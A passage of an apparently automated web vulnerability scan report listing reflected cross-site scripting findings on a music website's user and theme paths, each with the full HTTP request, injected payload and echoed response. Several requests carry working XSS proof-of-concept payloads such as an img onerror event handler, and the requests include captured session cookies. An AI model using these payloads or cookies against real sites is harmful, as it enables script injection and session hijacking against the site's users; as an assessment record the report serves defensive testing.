The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3415b"><a>260dbcb4f32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes3415b"><a>260dbcb4f32/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes3415b"><a>260dbcb4f32-clash-favicon.ico">
...[SNIP]...

3.98. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46042"><a>a2bcbcb7296 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes/clash46042"><a>a2bcbcb7296/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes-clash46042"><a>a2bcbcb7296-favicon.ico">
...[SNIP]...

3.99. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92e1"><a>ddaf3efe544 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes/clash/favicon.icob92e1"><a>ddaf3efe544 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes-clash-favicon.icob92e1"><a>ddaf3efe544">
...[SNIP]...

3.100. http://www.clashmusic.com/user/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a92"><a>dbba4fc9041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user35a92"><a>dbba4fc9041/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:14:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-user35a92"><a>dbba4fc9041-a">
...[SNIP]...

3.101. http://www.clashmusic.com/user/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 937e6--><img%20src%3da%20onerror%3dalert(1)>b86330b2446 was submitted in the REST URL parameter 2. This input was echoed as 937e6--><img src=a onerror=alert(1)>b86330b2446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/a937e6--><img%20src%3da%20onerror%3dalert(1)>b86330b2446 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user a937e6--><img src=a onerror=alert(1)>b86330b2446 a937e6-->
...[SNIP]...

3.102. http://www.clashmusic.com/user/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86a9"><img%20src%3da%20onerror%3dalert(1)>af52281002d was submitted in the REST URL parameter 2. This input was echoed as e86a9"><img src=a onerror=alert(1)>af52281002d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/ae86a9"><img%20src%3da%20onerror%3dalert(1)>af52281002d HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user ae86a9"><img src=a onerror=alert(1)>af52281002d ae86a9">
...[SNIP]...

3.103. http://www.clashmusic.com/user/a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2cf1"><a>6d69f2fc0a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/a?f2cf1"><a>6d69f2fc0a7=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user a a sidebar-right" id="page-user-a?f2cf1"><a>6d69f2fc0a7=1">
...[SNIP]...

3.104. http://www.clashmusic.com/user/password [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1c9"><a>38bd166a4a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /userdd1c9"><a>38bd166a4a2/password HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-userdd1c9"><a>38bd166a4a2-password">
...[SNIP]...

3.105. http://www.clashmusic.com/user/password [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 37226--><img%20src%3da%20onerror%3dalert(1)>025ae694cc3 was submitted in the REST URL parameter 2. This input was echoed as 37226--><img src=a onerror=alert(1)>025ae694cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/password37226--><img%20src%3da%20onerror%3dalert(1)>025ae694cc3 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:09:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:09:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user password37226--><img src=a onerror=alert(1)>025ae694cc3 password37226-->
...[SNIP]...

3.106. http://www.clashmusic.com/user/password [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d65"><img%20src%3da%20onerror%3dalert(1)>93f2b1f87e4 was submitted in the REST URL parameter 2. This input was echoed as 95d65"><img src=a onerror=alert(1)>93f2b1f87e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/password95d65"><img%20src%3da%20onerror%3dalert(1)>93f2b1f87e4 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user password95d65"><img src=a onerror=alert(1)>93f2b1f87e4 password95d65">
...[SNIP]...

3.107. http://www.clashmusic.com/user/password [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b48f9"><a>a34f37c2a37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/password?b48f9"><a>a34f37c2a37=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user password password sidebar-right" id="page-user-password?b48f9"><a>a34f37c2a37=1">
...[SNIP]...

3.108. http://www.clashmusic.com/user/register [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e09ff"><a>cdd9a709dba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere09ff"><a>cdd9a709dba/register HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-usere09ff"><a>cdd9a709dba-register">
...[SNIP]...

3.109. http://www.clashmusic.com/user/register [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d93b"><img%20src%3da%20onerror%3dalert(1)>477a08ade76 was submitted in the REST URL parameter 2. This input was echoed as 8d93b"><img src=a onerror=alert(1)>477a08ade76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/register8d93b"><img%20src%3da%20onerror%3dalert(1)>477a08ade76 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:55 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
